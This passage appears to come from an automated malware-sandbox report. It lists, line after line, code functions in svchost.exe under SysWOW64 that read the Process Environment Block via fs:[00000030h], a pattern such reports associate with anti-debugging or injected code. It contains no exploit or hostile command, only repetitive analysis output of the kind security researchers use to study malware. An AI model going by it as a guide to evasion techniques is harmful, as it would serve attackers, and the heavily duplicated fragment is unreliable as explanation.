                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637152 mov eax, dword ptr fs:[00000030h]1_2_03637152
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]1_2_03631131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]1_2_03631131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036351ED mov eax, dword ptr fs:[00000030h]1_2_036351ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D71F9 mov esi, dword ptr fs:[00000030h]1_2_036D71F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366D1D0 mov eax, dword ptr fs:[00000030h]1_2_0366D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]1_2_0366D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037051CB mov eax, dword ptr fs:[00000030h]1_2_037051CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B0 mov eax, dword ptr fs:[00000030h]1_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03687190 mov eax, dword ptr fs:[00000030h]1_2_03687190
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B106E mov eax, dword ptr fs:[00000030h]1_2_036B106E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705060 mov eax, dword ptr fs:[00000030h]1_2_03705060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov ecx, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD070 mov ecx, dword ptr fs:[00000030h]1_2_036AD070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D705E mov ebx, dword ptr fs:[00000030h]1_2_036D705E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D705E mov eax, dword ptr fs:[00000030h]1_2_036D705E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B052 mov eax, dword ptr fs:[00000030h]1_2_0365B052
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036550E4 mov eax, dword ptr fs:[00000030h]1_2_036550E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036550E4 mov ecx, dword ptr fs:[00000030h]1_2_036550E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037050D9 mov eax, dword ptr fs:[00000030h]1_2_037050D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]1_2_036AD0C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]1_2_036AD0C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036590DB mov eax, dword ptr fs:[00000030h]1_2_036590DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BD080 mov eax, dword ptr fs:[00000030h]1_2_036BD080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BD080 mov eax, dword ptr fs:[00000030h]1_2_036BD080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D08D mov eax, dword ptr fs:[00000030h]1_2_0362D08D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03635096 mov eax, dword ptr fs:[00000030h]1_2_03635096
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]1_2_0365D090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]1_2_0365D090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366909C mov eax, dword ptr fs:[00000030h]1_2_0366909C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]1_2_03643740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]1_2_03643740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]1_2_03643740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703749 mov eax, dword ptr fs:[00000030h]1_2_03703749
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF72E mov eax, dword ptr fs:[00000030h]1_2_036EF72E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03633720 mov eax, dword ptr fs:[00000030h]1_2_03633720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]1_2_0364F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]1_2_0364F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]1_2_0364F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F972B mov eax, dword ptr fs:[00000030h]1_2_036F972B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]1_2_03629730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]1_2_03629730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03665734 mov eax, dword ptr fs:[00000030h]1_2_03665734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]1_2_0363973A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]1_2_0363973A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637703 mov eax, dword ptr fs:[00000030h]1_2_03637703
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]1_2_03635702
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]1_2_03635702
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]1_2_0366F71F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]1_2_0366F71F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]1_2_0363D7E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]1_2_036357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]1_2_036357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]1_2_036357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B97A9 mov eax, dword ptr fs:[00000030h]1_2_036B97A9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037037B6 mov eax, dword ptr fs:[00000030h]1_2_037037B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D7B0 mov eax, dword ptr fs:[00000030h]1_2_0365D7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF78A mov eax, dword ptr fs:[00000030h]1_2_036EF78A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
